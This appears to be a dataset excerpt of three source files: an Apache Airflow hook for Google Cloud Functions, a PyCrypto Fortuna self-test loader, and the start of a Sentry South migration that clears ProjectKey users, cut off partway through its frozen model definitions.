repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
nathanielvarona/airflow | airflow/providers/google/cloud/hooks/functions.py | 1 | 10000 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains a Google Cloud Functions Hook."""
import time
from typing import Any, Dict, List, Optional, Sequence, Union
import requests
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
# Time to sleep between active checks of the operation results
TIME_TO_SLEEP_IN_SECONDS = 1
class CloudFunctionsHook(GoogleBaseHook):
"""
Hook for the Google Cloud Functions APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
_conn = None # type: Optional[Any]
def __init__(
self,
api_version: str,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self.api_version = api_version
@staticmethod
def _full_location(project_id: str, location: str) -> str:
"""
Retrieve full location of the function in the form of
``projects/<GCP_PROJECT_ID>/locations/<GCP_LOCATION>``
:param project_id: The Google Cloud Project project_id where the function belongs.
:type project_id: str
:param location: The location where the function is created.
:type location: str
:return:
"""
return f'projects/{project_id}/locations/{location}'
def get_conn(self) -> build:
"""
Retrieves the connection to Cloud Functions.
:return: Google Cloud Function services object.
:rtype: dict
"""
if not self._conn:
http_authorized = self._authorize()
self._conn = build(
'cloudfunctions', self.api_version, http=http_authorized, cache_discovery=False
)
return self._conn
def get_function(self, name: str) -> dict:
"""
Returns the Cloud Function with the given name.
:param name: Name of the function.
:type name: str
:return: A Cloud Functions object representing the function.
:rtype: dict
"""
# fmt: off
return self.get_conn().projects().locations().functions().get( # pylint: disable=no-member
name=name).execute(num_retries=self.num_retries)
# fmt: on
@GoogleBaseHook.fallback_to_default_project_id
def create_new_function(self, location: str, body: dict, project_id: str) -> None:
"""
Creates a new function in Cloud Function in the location specified in the body.
:param location: The location of the function.
:type location: str
:param body: The body required by the Cloud Functions insert API.
:type body: dict
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().create( # pylint: disable=no-member
location=self._full_location(project_id, location),
body=body
).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
def update_function(self, name: str, body: dict, update_mask: List[str]) -> None:
"""
Updates Cloud Functions according to the specified update mask.
:param name: The name of the function.
:type name: str
:param body: The body required by the cloud function patch API.
:type body: dict
:param update_mask: The update mask - array of fields that should be patched.
:type update_mask: [str]
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().patch( # pylint: disable=no-member
updateMask=",".join(update_mask),
name=name,
body=body
).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def upload_function_zip(self, location: str, zip_path: str, project_id: str) -> str:
"""
Uploads zip file with sources.
:param location: The location where the function is created.
:type location: str
:param zip_path: The path of the valid .zip file to upload.
:type zip_path: str
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: The upload URL that was returned by generateUploadUrl method.
:rtype: str
"""
# fmt: off
# pylint: disable=no-member # noqa
response = \
self.get_conn().projects().locations().functions().generateUploadUrl(
parent=self._full_location(project_id, location)
).execute(num_retries=self.num_retries)
# fmt: on
upload_url = response.get('uploadUrl')
with open(zip_path, 'rb') as file:
requests.put(
url=upload_url,
data=file,
# Those two headers needs to be specified according to:
# https://cloud.google.com/functions/docs/reference/rest/v1/projects.locations.functions/generateUploadUrl
# nopep8
headers={
'Content-type': 'application/zip',
'x-goog-content-length-range': '0,104857600',
},
)
return upload_url
def delete_function(self, name: str) -> None:
"""
Deletes the specified Cloud Function.
:param name: The name of the function.
:type name: str
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().delete( # pylint: disable=no-member
name=name).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def call_function(
self,
function_id: str,
input_data: Dict,
location: str,
project_id: str,
) -> dict:
"""
Synchronously invokes a deployed Cloud Function. To be used for testing
purposes as very limited traffic is allowed.
:param function_id: ID of the function to be called
:type function_id: str
:param input_data: Input to be passed to the function
:type input_data: Dict
:param location: The location where the function is located.
:type location: str
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
name = f"projects/{project_id}/locations/{location}/functions/{function_id}"
# fmt: off
response = self.get_conn().projects().locations().functions().call( # pylint: disable=no-member
name=name,
body=input_data
).execute(num_retries=self.num_retries)
# fmt: on
if 'error' in response:
raise AirflowException(response['error'])
return response
def _wait_for_operation_to_complete(self, operation_name: str) -> dict:
"""
Waits for the named operation to complete - checks status of the
asynchronous call.
:param operation_name: The name of the operation.
:type operation_name: str
:return: The response returned by the operation.
:rtype: dict
:exception: AirflowException in case error is returned.
"""
service = self.get_conn()
while True:
# fmt: off
operation_response = service.operations().get( # pylint: disable=no-member
name=operation_name,
).execute(num_retries=self.num_retries)
# fmt: on
if operation_response.get("done"):
response = operation_response.get("response")
error = operation_response.get("error")
# Note, according to documentation always either response or error is
# set when "done" == True
if error:
raise AirflowException(str(error))
return response
time.sleep(TIME_TO_SLEEP_IN_SECONDS)
| apache-2.0 |
rorasa/KeeTerm | Crypto/SelfTest/Random/Fortuna/__init__.py | 118 | 1825 | # -*- coding: utf-8 -*-
#
# SelfTest/Random/Fortuna/__init__.py: Self-test for Fortuna modules
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test for the Crypto.Random.Fortuna package"""
__revision__ = "$Id$"
import os
def get_tests(config={}):
tests = []
from Crypto.SelfTest.Random.Fortuna import test_FortunaAccumulator; tests += test_FortunaAccumulator.get_tests(config=config)
from Crypto.SelfTest.Random.Fortuna import test_FortunaGenerator; tests += test_FortunaGenerator.get_tests(config=config)
from Crypto.SelfTest.Random.Fortuna import test_SHAd256; tests += test_SHAd256.get_tests(config=config)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| mit |
argonemyth/sentry | src/sentry/migrations/0168_unfill_projectkey_user.py | 34 | 36774 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
ProjectKey = orm['sentry.ProjectKey']
ProjectKey.objects.filter(
user__isnull=False,
).update(user=None)
def backwards(self, orm):
pass
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'audit_actors'", 'to': "orm['sentry.User']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'headers': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
